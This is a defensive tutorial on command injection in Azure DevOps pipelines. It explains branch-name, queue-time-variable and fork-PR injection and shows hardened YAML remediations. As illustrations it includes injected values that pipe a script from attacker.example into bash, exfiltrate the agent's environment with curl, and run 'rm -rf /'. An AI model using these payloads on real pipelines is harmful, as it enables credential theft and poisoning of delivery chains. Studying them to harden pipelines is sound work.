A pull request arrives from a fork. The branch is named main; curl https://attacker.example/exfil.sh | bash; echo. Your pipeline uses $(Build.SourceBranchName) in a script step. The script runs the branch name as shell. The exfiltration runs too.
Azure DevOps YAML expressions were designed to make pipelines flexible. That flexibility is also an attack surface. Macro expansion happens just before task execution — if user-controlled data reaches a script: field via $(varName), an attacker with the ability to submit a PR or set a queue-time variable can execute arbitrary code in the pipeline agent’s context. The agent has access to service connections, deployment credentials, and artifact feeds. A compromised agent is a compromised delivery chain.
This article gives you the practical tools to:
- Identify which expression types create injection surface and which do not.
- Understand the three primary injection vectors: macro expansion, queue-time variables, and fork PR metadata.
- Apply the
env:block pattern to eliminate the most common injection class. - Use typed parameters with
values:constraints to reject invalid input at parse time. - Enforce organization-wide security baselines using
extendstemplates and pipeline decorators.
We cover the threat model, the three injection vectors, four defensive patterns ordered by strength, and a hardening checklist you can apply to any pipeline in an afternoon.
The Threat Model
What Attackers Can Control
Three actor types can introduce malicious data into a pipeline without modifying the pipeline YAML directly.
PR submitters — any authenticated user who can open a pull request — control the branch name, commit message, PR title, PR description, and (when the PR comes from a fork) the YAML file content itself. None of these values are sanitized by Azure DevOps before they are made available as pipeline variables.
Queue-time variable setters — users with the “Queue builds” permission — can override any pipeline variable that is not explicitly locked. They do this through the “Run pipeline” UI or the Azure DevOps REST API. The variable value they supply is treated identically to the value defined in the YAML file.
Authenticated pipeline triggerers — users with “Queue builds” permission — can supply parameter values at trigger time. Any string parameter without a values: constraint accepts arbitrary input.
| Actor | What They Control | Injection Surface | Required Permission |
|---|---|---|---|
| PR Submitter | Branch name, commit message, PR title, PR description, YAML (from fork) | $(Build.SourceBranchName), $(Build.SourceVersionMessage), $(System.PullRequest.SourceBranch) | Contributor or fork author |
| Queue-Time Variable Setter | Any pipeline variable not marked readonly: true | Any $(varName) used in scripts when varName is a YAML-defined variable | Queue builds |
| Authenticated Triggerer | Pipeline parameters at trigger time | Any unconstrained string parameter used in scripts via ${{ parameters.param }} | Queue builds |
An attacker does not need to modify the pipeline YAML to exploit injection. They only need to control a value that reaches an unsafe expression context.
What Happens When Injection Succeeds
A successful pipeline injection runs attacker-controlled code in the agent’s security context. The agent process has access to every credential the pipeline has been granted:
- The repository checkout token (read access to the source repo and other repos in the org, depending on scope settings)
- Service connection credentials loaded as environment variables or mounted as Azure CLI sessions
- Secrets from variable groups injected at job initialization
- Any files on the agent’s local disk written by previous pipeline steps
The attack sequence after a successful injection: exfiltrate the service connection credentials via an outbound HTTP request, use those credentials to push a malicious build artifact to the container registry, or trigger a deployment to a protected environment before the pipeline run is even flagged as suspicious.
Artifact poisoning is particularly dangerous because it is persistent. A compromised container image pushed to a shared registry contaminates every downstream service that pulls from it — the blast radius extends far beyond the single pipeline run.
Expression Types and Their Injection Risk
The three Azure DevOps expression syntaxes have different risk profiles:
| Expression Type | Evaluation Phase | Injection Risk | Risk Condition |
|---|---|---|---|
$(varName) macro expansion | Runtime, before task starts | High | Value substituted as raw string into command; shell metacharacters execute |
${{ expression }} compile-time | Parse time | Medium | Unconstrained string parameters used inline in script: fields are injectable |
$[ expression ] runtime | Runtime, in condition fields | Low (conditional) | Safe in condition: fields; risk reapplies if result is mapped to a variable used in a script |
Macro expansion is the highest-risk because it is a literal string substitution that occurs after the YAML is loaded but before the shell receives the command. The shell sees the macro-expanded string as the command to execute. Shell metacharacters (;, |, &&, backticks, $()) in the substituted value are interpreted by the shell — not treated as data.
Compile-time expressions are medium-risk because parameters can carry typed constraints. A string parameter with a values: list rejects invalid values at parse time. Without that constraint, ${{ parameters.userInput }} inline in a script: field is as injectable as macro expansion.
Injection Vector 1 — Macro Expansion in Scripts
The Classic Branch Name Injection
$(Build.SourceBranchName) is a predefined variable populated from the Git ref name. Azure DevOps does not sanitize it. A branch named main; curl https://attacker.example/exfil.sh | bash; echo is a valid Git branch name.
The vulnerable pipeline:
# VULNERABLE: macro substitutes branch name directly into the command string
steps:
- script: |
echo "Building branch $(Build.SourceBranchName)"
docker build -t myapp:$(Build.SourceBranchName) .
displayName: 'Build image'
When the pipeline runs against that branch, the shell receives:
echo "Building branch main; curl https://attacker.example/exfil.sh | bash; echo"
docker build -t myapp:main; curl https://attacker.example/exfil.sh | bash; echo .
The semicolon terminates the echo command. The curl | bash runs as a separate command with the agent’s full credential access. The trailing echo suppresses any output from the injected command so the log looks clean.
Diagram: YAML Injection vs. env: Block Mitigation
This diagram visualizes how a malicious branch name is expanded into a command string, causing a shell injection, and how the env: block pattern prevents it by treating the data as inert.
Visual Notes:
- Unsafe Flow: The malicious input becomes part of the command structure during substitution. The shell interprets the semicolon as a command terminator and executes the rest.
- Safe Flow: The malicious input is passed as process data. The shell treats it as a single string, and metacharacters like
;or|lose their special meaning.
This class of vulnerability applies to any predefined variable sourced from attacker-controlled Git metadata. The mechanism is identical for commit messages and PR fields.
The Fix — The env: Block Pattern
Assign the macro-expanded value to an environment variable in the step’s env: block. Reference the environment variable inside the script using the shell’s native variable syntax.
# SECURE: branch name passed as process environment variable — metacharacters are inert
steps:
- script: |
echo "Building branch $BRANCH_NAME"
docker build -t "myapp:$BRANCH_NAME" .
displayName: 'Build image'
env:
BRANCH_NAME: $(Build.SourceBranchName)
The OS passes environment variables to the child process through a separate channel from the command string. The shell expands $BRANCH_NAME after the command is already parsed. By the time the shell sees the value, the command structure is fixed — the semicolons, pipes, and backticks in the value are data inside a string, not shell syntax.
With the env: block pattern:
- The command string is a compile-time constant that contains no user-controlled content
- The attacker-controlled value arrives at the script as process data, not as part of the command
- The double-quoting (
"myapp:$BRANCH_NAME") prevents word splitting and glob expansion, covering the case where the branch name contains spaces
In PowerShell steps, reference the variable as $env:BRANCH_NAME:
steps:
- pwsh: |
Write-Host "Building branch $env:BRANCH_NAME"
docker build -t "myapp:$env:BRANCH_NAME" .
displayName: 'Build image (PowerShell)'
env:
BRANCH_NAME: $(Build.SourceBranchName)
High-Risk Predefined Variables
Every predefined variable sourced from Git metadata or user-submitted PR data is a potential injection vector. Treat all of them as untrusted input:
| Variable | Source | Risk |
|---|---|---|
$(Build.SourceBranchName) | Git ref name | High — branch names allow shell metacharacters |
$(Build.SourceBranch) | Full ref path (refs/heads/…) | High — same source, more characters |
$(Build.SourceVersionMessage) | Git commit message | High — developers legitimately use `, ", ; in commit messages |
$(System.PullRequest.SourceBranch) | PR source branch | High |
$(System.PullRequest.Title) | PR title (user input) | High |
$(Build.RequestedFor) | Triggering user’s display name | Medium — display names can contain special chars |
$(Build.Repository.Name) | Repository name | Medium — org-controlled but validate on cross-org triggers |
Apply the env: block pattern to every script step that uses any of these variables. There is no safe way to use them directly in a command string.
Injection Vector 2 — Queue-Time Variable Overrides
How Queue-Time Overrides Work
Any pipeline variable defined in the YAML variables: block can be overridden at queue time by a user with “Queue builds” permission — they supply a custom value in the “Run pipeline” dialog or through the REST API (POST /build/builds). The override applies to every use of $(varName) in the pipeline run.
The vulnerable pattern:
# VULNERABLE: deployTarget can be overridden to any value at queue time
variables:
- name: deployTarget
value: kubernetes.prod.internal
steps:
- script: kubectl config use-context $(deployTarget)
displayName: 'Set deployment context'
- script: kubectl apply -f manifests/ --context=$(deployTarget)
displayName: 'Apply manifests'
A user with “Queue builds” permission triggers the pipeline with deployTarget set to kubernetes.attacker.internal — or with kubernetes.prod.internal; cat /proc/1/environ | base64 | curl -d @- https://attacker.example/dump — and the pipeline deploys to the wrong cluster or exfiltrates the agent’s environment.
readonly: true — Locking Variables
Add readonly: true to any variable declaration that should not be overridden at queue time or modified by ##vso[task.setvariable] logging commands inside a running job:
variables:
- name: deployTarget
value: kubernetes.prod.internal
readonly: true # queue-time override rejected; ##vso[task.setvariable] blocked
- name: containerRegistry
value: myregistry.azurecr.io
readonly: true
- name: buildId
value: $(Build.BuildId)
readonly: true
When a user attempts to override a readonly: true variable in the “Run pipeline” UI, the field is grayed out. When a running script attempts to override it via ##vso[task.setvariable variable=deployTarget]kubernetes.attacker.internal, the agent logs:
VariableName is read-only and can't be changed.
Mark any variable that influences: the deployment target, the environment name, the service connection selector, the artifact feed URL, or any security-relevant path.
Limitation: readonly: true applies only to variables defined in the YAML variables: block. It does not affect variables defined in the Azure DevOps UI (pipeline variables tab) or variables supplied by variable groups. Furthermore, if a - group: appears after a YAML variable definition of the same name, the group’s value overwrites the YAML value and the readonly status may be lost. Restrict variable group access in the Library security settings.
Typed Parameters as a Stronger Gate
readonly: true locks a specific value. A typed parameter with a values: constraint enforces an allowlist — only values in the approved list are accepted, and the check happens at parse time before any agent is allocated:
# SECURE: deployEnvironment is validated against an allowlist at parse time
parameters:
- name: deployEnvironment
type: string
values:
- dev
- staging
- prod
steps:
- bash: kubectl config use-context "$DEPLOY_ENV"
displayName: 'Set deployment context'
env:
DEPLOY_ENV: ${{ parameters.deployEnvironment }}
If a caller passes prod; rm -rf /, Azure DevOps rejects the run at parse time:
/azure-pipelines.yml (Line: 4, Col: 7): 'prod; rm -rf /' is not a valid value for 'deployEnvironment'. Valid values: dev, staging, prod.
No agent starts. No credentials are loaded. The rejection is instantaneous.
Typed parameters are stronger than readonly: true for two reasons: they enforce an allowlist (not just immutability), and they block invalid values even when the parameter comes from another template’s parameter pass-through.
Use type: boolean for feature-flag parameters — no value other than true or false is accepted, making injection through a boolean parameter impossible by construction.
When to use which control:
| Situation | Control |
|---|---|
| Existing YAML variable that should not be overridden | readonly: true |
| New parameter that selects from a fixed set (environment, registry) | Typed parameter with values: |
| Value must be user-controlled but safe to pass to a script | env: block pattern |
| Production-influencing value that should never be user-controlled | readonly: true + env: block |
Injection Vector 3 — Fork PR Pipelines
The Fork Threat Surface
When a pipeline is triggered by a PR from a fork repository, the fork controls the branch. If the pipeline loads YAML from the PR branch (the default for PR-triggered pipelines), the fork author can modify the pipeline YAML itself — not just the variable values. This elevates the threat from data injection to full pipeline compromise.
By default, Azure DevOps runs fork PR pipelines with a restricted token and without access to protected resources (environments, service connections, variable groups, agent pools, and secure files marked as protected). This is the “safe fork” configuration. If the “safe fork” settings are relaxed, or if the pipeline uses non-protected resources, a fork PR pipeline has the same credential access as a mainline pipeline run.
Protected Resources
Mark service connections, variable groups, agent pools, environments, and secure files as “protected” — protected resources require an approval before a pipeline that does not come from an authorized branch can use them.
To mark a service connection as protected:
- Navigate to Project Settings → Service Connections
- Open the service connection → Security
- Enable “Grant access permission to all pipelines” = Off (restrict access)
- Set “Protected resource” = On
When a fork PR pipeline requests a protected service connection, a pipeline reviewer sees an approval prompt before the job starts. The fork author cannot proceed past that gate without human review.
All service connections that access production systems should be protected resources:
| Resource Type | Protect These | Leave Unprotected |
|---|---|---|
| Service connections | Production registries, production environments, key vaults, prod subscriptions | Dev/test Azure subscriptions with no sensitive data |
| Variable groups | Any group containing secrets or production configuration | Non-sensitive build configuration |
| Environments | Production, staging-with-approvals | Dev environments with no real credentials |
| Agent pools | Self-hosted pools with production network access | Microsoft-hosted pools |
YAML from Protected Branches
Configure the pipeline to load YAML from a protected branch rather than from the PR branch. When YAML comes from the protected branch, the fork author can only modify application code — the pipeline logic itself stays under the control of the protected branch owners.
To configure this in Azure DevOps:
- Navigate to the pipeline → Edit → … (three dots) → Triggers
- Under Pull request validation, enable “Require a team member’s comment before building a pull request” for forks
- Under the branch policy for the protected branch (Repos → Branches → Branch policies), add a Build Validation rule and set “Path filter” to include
azure-pipelines.yml— this ensures pipeline YAML changes require code review
This setting does not prevent all injection — branch names and PR metadata are still attacker-controlled — but it eliminates the class of attacks where the fork modifies the pipeline definition to bypass security controls entirely.
Defensive Patterns — From Component to Organization
Compile-Time Parameter Validation with ${{ if }}
A values: constraint on a parameter is the primary gate. A compile-time ${{ if }} validation block provides defense-in-depth for templates that receive parameters from other templates, where the outer caller’s values: constraint may not apply:
# deploy-steps.yml — two-gate validation: values constraint + compile-time check
parameters:
- name: environment
type: string
values: # gate 1: parse-time allowlist (applies when called directly)
- dev
- staging
- prod
steps:
# Gate 2: compile-time validation (applies even when called from another template)
- ${{ if not(containsValue(array('dev', 'staging', 'prod'), parameters.environment)) }}:
- script: exit 1
displayName: "SECURITY: Invalid environment '${{ parameters.environment }}' rejected"
- bash: kubectl config use-context "$DEPLOY_ENV"
displayName: 'Set deployment context'
env:
DEPLOY_ENV: ${{ parameters.environment }}
The containsValue() function checks membership in an explicit array. If the value is not in the array, the validation step is injected and the pipeline fails immediately with a display name that includes the rejected value — making the audit trail clear.
Log the invalid value in the failing step’s display name rather than in the script body. Display names appear in the pipeline timeline without requiring the step to execute, so auditors can see the rejected value even if the step is never reached.
extends Templates for Organization-Wide Baselines
An extends template wraps the entire pipeline. Any pipeline that declares extends: template: security-baseline.yml@templates runs all of its stages inside the baseline’s control. The baseline can enforce mandatory pre-steps, post-steps, and step type restrictions.
The pipeline file:
# azure-pipelines.yml — all stages must extend the security baseline
extends:
template: security/baseline.yml@templates
parameters:
stages:
- stage: Build
displayName: 'Build and Test'
jobs:
- job: BuildApp
pool:
vmImage: ubuntu-latest
steps:
- script: dotnet build --configuration Release
displayName: 'Build'
- script: dotnet test --no-build
displayName: 'Test'
The baseline template:
# security/baseline.yml — mandatory security envelope
parameters:
- name: stages
type: stageList
default: []
stages:
# Pre-stage: runs before any caller stages
- stage: SecurityScan
displayName: 'Security Pre-Scan'
jobs:
- job: CredentialScan
pool:
vmImage: ubuntu-latest
steps:
- task: MicrosoftSecurityDevOps@1
displayName: 'Scan for secrets and vulnerabilities'
inputs:
categories: 'secrets,code'
# Caller stages: injected between pre and post
- ${{ each stage in parameters.stages }}:
- ${{ stage }}
# Post-stage: always runs, even if a caller stage fails (condition: always())
- stage: AuditLog
displayName: 'Audit Log'
condition: always()
jobs:
- job: WriteAuditEntry
pool:
vmImage: ubuntu-latest
steps:
- bash: |
echo "Pipeline: $(Build.DefinitionName)"
echo "Build ID: $(Build.BuildId)"
echo "Triggered by: $(Build.RequestedFor)"
echo "Branch: $BRANCH_NAME"
echo "Result: $(Agent.JobStatus)"
displayName: 'Write audit entry'
env:
BRANCH_NAME: $(Build.SourceBranchName)
To make the baseline mandatory, add a “Required pipeline template” policy in Azure DevOps:
- Project Settings → Pipelines → Settings
- Enable “Require pipeline YAML to extend an approved template”
- Add
security/baseline.yml@templatesas the required template
Once enforced, any pipeline that does not extend the baseline is rejected before it can run. Pipeline authors cannot bypass the security scan by omitting the extends: declaration.
Pipeline Decorators for Non-Bypassable Injection
Pipeline decorators inject steps into every pipeline run in the organization. Unlike extends templates, which require the pipeline author to declare extends:, decorators apply automatically — pipeline authors cannot opt out by modifying their pipeline YAML.
A decorator is authored as an Azure DevOps extension. It defines pre-job and post-job steps that the agent injects around every job, regardless of the pipeline’s content:
# decorator manifest (vss-extension.json contribution target)
# This YAML is injected before every job in the organization
steps:
- task: MicrosoftSecurityDevOps@1
displayName: '[Decorator] Secret scan'
condition: always()
inputs:
categories: 'secrets'
- bash: |
echo "Job started: $(Build.BuildId) / $(System.JobName)"
echo "Repository: $(Build.Repository.Name)"
echo "Agent: $(Agent.Name)"
displayName: '[Decorator] Audit: job start'
condition: always()
Decorators run with higher trust than pipeline YAML. They cannot be removed or disabled from within the pipeline. Use them to inject credential scanning, runtime anomaly detection, and mandatory audit logging that applies to every pipeline in the organization without requiring any pipeline author action.
The trade-off: decorators add execution time to every job. A 30-second credential scan adds 30 seconds to every pipeline run across the organization. Minimize decorator overhead by running scans in parallel with early job steps where possible, and scope decorators to specific agent pools if not all pipelines need the same controls.
Hands-On Example: Hardening a PR-Triggered Build Pipeline
Scenario: A security engineer audits a PR-triggered build pipeline that builds a .NET application and pushes a container image to a private registry. The audit finds three vulnerabilities: (1) $(Build.SourceBranchName) used directly in a shell script for image tagging; (2) the containerRegistry variable is overridable at queue time; (3) the pipeline runs on fork PRs with access to the container registry service connection. All three need remediation without breaking the pipeline’s functionality.
Before — the vulnerable pipeline:
# azure-pipelines.yml — BEFORE: three injection vulnerabilities
trigger:
- main
pr:
- main
variables:
- name: containerRegistry
value: myregistry.azurecr.io # overridable at queue time
- name: imageName
value: myapp
stages:
- stage: Build
jobs:
- job: BuildAndPush
pool:
vmImage: ubuntu-latest
steps:
- task: Docker@2
displayName: 'Build image'
inputs:
containerRegistry: sc-myregistry # not a protected resource
repository: $(imageName)
command: build
# VULNERABILITY 1: branch name macro directly in a Dockerfile arg
arguments: '--build-arg BRANCH=$(Build.SourceBranchName)'
tags: $(Build.BuildId)
# VULNERABILITY 2: containerRegistry variable used in script (overridable)
- script: |
echo "Pushing to $(containerRegistry)/$(imageName):$(Build.SourceBranchName)"
docker push $(containerRegistry)/$(imageName):$(Build.SourceBranchName)
displayName: 'Push image'
- script: |
echo "Branch: $(Build.SourceBranchName)"
git tag -a "build-$(Build.SourceBranchName)" -m "CI build"
git push origin "build-$(Build.SourceBranchName)"
displayName: 'Tag commit'
After — all three vulnerabilities remediated:
# azure-pipelines.yml — AFTER: all three vectors closed
trigger:
- main
pr:
branches:
include:
- main
# Require a comment from a team member before building fork PRs
# (configured in branch policy, not YAML — noted here for documentation)
variables:
- name: containerRegistry
value: myregistry.azurecr.io
readonly: true # FIX 2: cannot be overridden at queue time
- name: imageName
value: myapp
readonly: true
stages:
- stage: Build
jobs:
- job: BuildAndPush
pool:
vmImage: ubuntu-latest
steps:
# FIX 3: sc-myregistry is now a protected resource;
# fork PR pipelines trigger an approval prompt before this task runs
- task: Docker@2
displayName: 'Login to ACR'
inputs:
command: login
containerRegistry: sc-myregistry
# FIX 1a: task replaced with bash script; branch name moved to env block.
# The Dockerfile receives it securely via --build-arg
- bash: |
docker build -t "$REGISTRY/$IMAGE_NAME:$(Build.BuildId)" \
--build-arg BRANCH="$BRANCH_NAME" .
displayName: 'Build image (Secure)'
env:
REGISTRY: $(containerRegistry)
IMAGE_NAME: $(imageName)
BRANCH_NAME: $(Build.SourceBranchName) # safe: passed as process data
# FIX 1b: branch name consumed via environment variable in all scripts
- bash: |
echo "Pushing to $REGISTRY/$IMAGE_NAME:$(Build.BuildId)"
docker push "$REGISTRY/$IMAGE_NAME:$(Build.BuildId)"
displayName: 'Push image'
env:
REGISTRY: $(containerRegistry) # readonly var; safe to expand here
IMAGE_NAME: $(imageName)
- bash: |
echo "Branch: $BRANCH_NAME"
# The shell substitution ${BRANCH_NAME//[^a-zA-Z0-9._-]/-} replaces
# any character that is not alphanumeric, dot, underscore, or hyphen
# with a hyphen — producing a safe git tag even with a crafted branch name
SAFE_BRANCH="${BRANCH_NAME//[^a-zA-Z0-9._-]/-}"
git tag -a "build-$SAFE_BRANCH" -m "CI build"
git push origin "build-$SAFE_BRANCH"
displayName: 'Tag commit'
env:
BRANCH_NAME: $(Build.SourceBranchName)
Remediation Steps:
- Fix Vector 1 (macro injection): Move all
$(Build.SourceBranchName)references from script bodies and task arguments intoenv:blocks asBRANCH_NAME: $(Build.SourceBranchName). Update all scripts to reference$BRANCH_NAME(Bash) or$env:BRANCH_NAME(PowerShell). Convert theDocker@2build task to abash:script becauseDocker@2does not natively expandenv:blocks into itsarguments:field. - Fix Vector 2 (queue-time override): Add
readonly: trueto thecontainerRegistryandimageNamevariable declarations. Alternatively, replace with typed string parameters withvalues:constraints listing approved registries. - Fix Vector 3 (fork PR access): In Project Settings → Service Connections → sc-myregistry → Security, enable “Protected resource.” Verify fork PR pipelines trigger an approval prompt before the Docker login task runs.
- Add defense-in-depth: Add a compile-time validation block for any string parameters used in script arguments. Sanitize the branch name in the git tag step using a shell substitution to enforce safe characters. Use explicit
bash:step types to ensure shell substitutions work consistently regardless of agent OS.
Verify remediation:
- Create a local branch named
test; echo INJECTED > /tmp/pwnedand push it. Confirm the pipeline log shows the literal branch name in the output, not the wordINJECTED, and no/tmp/pwnedfile is created. - Attempt to override
containerRegistryat queue time. Confirm the field is grayed out in the “Run pipeline” dialog. - Submit a PR from a fork. Confirm the pipeline shows an approval prompt before the Docker task executes.
Best Practices
Do:
- Apply the
env:block pattern to every script step that needs a user-controlled or Git-sourced value — it is the single most impactful security change for most pipelines. - Mark all service connections that access production systems as protected resources.
- Use typed parameters with
values:allowlists for environment selectors. - Load pipeline YAML from a protected branch for PR-triggered pipelines to prevent fork authors from modifying the pipeline logic.
- Audit
variables:blocks for any variable used in ascript:field and addreadonly: trueto those that should not be overridden at queue time. - Pass
$(System.AccessToken)via theenv:block asSYSTEM_TOKEN: $(System.AccessToken)— never expand it inline in a script command where it could be echoed to logs.
Don’t:
- Enable “Make secrets available to builds from forks” unless the pipeline runs in a completely isolated agent pool with no access to production systems.
- Rely on secret masking as your only security control — secrets are masked in Azure DevOps logs, but a compromised agent can exfiltrate them through outbound network calls, file writes, or side-channels that bypass the log output.
- Use unconstrained
stringparameters inscript:fields via${{ parameters.myParam }}inline in the command — compile-time parameters withoutvalues:constraints are injectable if a caller can supply arbitrary input. - Trust
$(Build.Repository.Name)or$(Build.RequestedFor)as safe inputs — they are org-controlled for internal repos but validate them the same way as any external input.
Audit and detection:
Run this query against your pipeline YAML files to find the most common injection patterns:
# Find macro expansion of user-controlled variables in script fields
grep -rn '\$(Build\.Source\|System\.PullRequest\|Build\.Requested' \
--include="*.yml" ./ | grep -v 'env:'
Every match where the variable is not inside an env: block is a candidate for remediation.
Use Azure DevOps audit logs (Organization Settings → Auditing) to monitor:
- Service connection access events — which pipelines accessed which connections and when.
- Pipeline variable override events — queue-time overrides attempted or applied.
- Protected resource approval events — who approved and who requested.
Compliance:
The extends template enforcement combined with protected resources satisfies the “pipeline-as-code with mandatory review” control in SOC 2 Type II and ISO 27001 change management domains. The values: allowlists for environment-selecting parameters function as the access control list for deployment targets — document them as part of the change management record.
Troubleshooting Common Issues
Issue 1: The env: block fix broke a script that constructed a command from the variable
Cause: The script used the variable value as part of the command string directly — for example, docker tag myimage:$(Build.BuildId) where the build ID was expected to be part of the command. Moving to env: requires the script to read the environment variable and construct the command inside the script body.
Solution:
# BEFORE (vulnerable):
- script: docker tag myimage:$(Build.BuildId) myimage:latest
# AFTER (safe): construct the tag inside the script body
- bash: docker tag "myimage:$BUILD_ID" myimage:latest
env:
BUILD_ID: $(Build.BuildId)
Issue 2: readonly: true on a YAML variable is still being overridden by a variable group
Cause: readonly: true prevents queue-time UI overrides and ##vso[task.setvariable] logging commands from changing the variable. It does not block a variable group linked to the pipeline from supplying a value for the same variable name. Variable group values are applied before readonly is evaluated.
Solution: Remove the variable from the variable group, or rename the variable group’s version. Control variable group access through the group’s permissions settings (Pipelines → Library → variable group → Security) — restrict which pipelines can link to the group.
Issue 3: Fork PR pipelines still access the protected service connection without an approval prompt
Cause: The pipeline was run before the “protected resource” setting was saved, or the service connection was not saved after the protection flag was applied. Azure DevOps caches pipeline resource authorization — an existing run may not pick up the new protection flag.
Solution: Re-open Project Settings → Service Connections → Security, confirm the protected resource toggle is enabled, and save. Trigger a completely new run (not a retry of an existing run) from a fork PR. The approval prompt appears for new runs only.
Issue 4: A values: constraint blocks a legitimate automation script that sets a non-standard environment name
Cause: The automation script passes a dynamically computed environment string that does not match the allowlist. The values: constraint correctly rejects it — but the automation is a legitimate use case.
Solution: Add the automation’s environment values to the values: list. If the automation needs fully arbitrary values, create a separate parameter without a values: constraint and route it through a dedicated pipeline that has more restricted trigger settings (e.g., restricted to specific service accounts, not available to PR triggers).
Issue 5: A pipeline decorator is injecting into pipelines it should not affect
Cause: Pipeline decorators apply to every pipeline run in the organization by default. The decorator manifest has no built-in scope restriction per project or per agent pool.
Solution: Add a condition in the injected step that checks $(System.TeamProject) or $(Build.Repository.Name) and exits early for out-of-scope pipelines:
# Decorator step with early-exit condition for out-of-scope projects
steps:
- bash: |
if [ "$TEAM_PROJECT" != "Production" ] && [ "$TEAM_PROJECT" != "Platform" ]; then
echo "Decorator: not applicable to project $TEAM_PROJECT — skipping"
exit 0
fi
# Run the actual scan
./security-scan.sh
displayName: '[Decorator] Security scan'
condition: always()
env:
TEAM_PROJECT: $(System.TeamProject)
Alternatively, use the target: configuration in the decorator’s vss-extension.json to restrict injection to specific pipeline definitions by ID.
Key Takeaways
- The primary injection vector is macro expansion:
$(varName)substitutes the value as a raw string into the command before shell parsing. Moving any user-controlled or Git-sourced value from the command string into theenv:block eliminates this injection class entirely. - Queue-time variable overrides are an injection vector for any variable used in a script. Lock production-influencing variables with
readonly: true, and replace unconstrained string inputs with typed parameters that havevalues:allowlists. - Fork PR pipelines are the highest-risk trigger context. Mark all service connections for production resources as protected, and configure the pipeline to load YAML from a protected branch — never from the fork.
extendstemplates are the strongest pipeline-level control: they make a security baseline mandatory and unskippable for all pipelines that use them. Combined with a “Required pipeline template” policy, no pipeline in the organization can run without the baseline.- Secret masking is not a security control. Secrets masked in logs are still present in environment memory and accessible to any code running in the agent process. The real control is restricting which pipelines can access secrets via protected resources and mandatory approval gates.
Next steps:
- Grep all
script:andbash:steps for$(Build.Source,$(System.PullRequest, and$(Build.RequestedFor— every match outside anenv:block is a candidate for the fix described in Section 2. - Mark your three highest-privilege service connections (production registry, production environment, key vault) as protected resources — this single change prevents the most damaging fork PR attacks.
- Review the
variables:block in every pipeline that runs on PR triggers and addreadonly: trueto any variable that selects a deployment target, registry, or environment name.
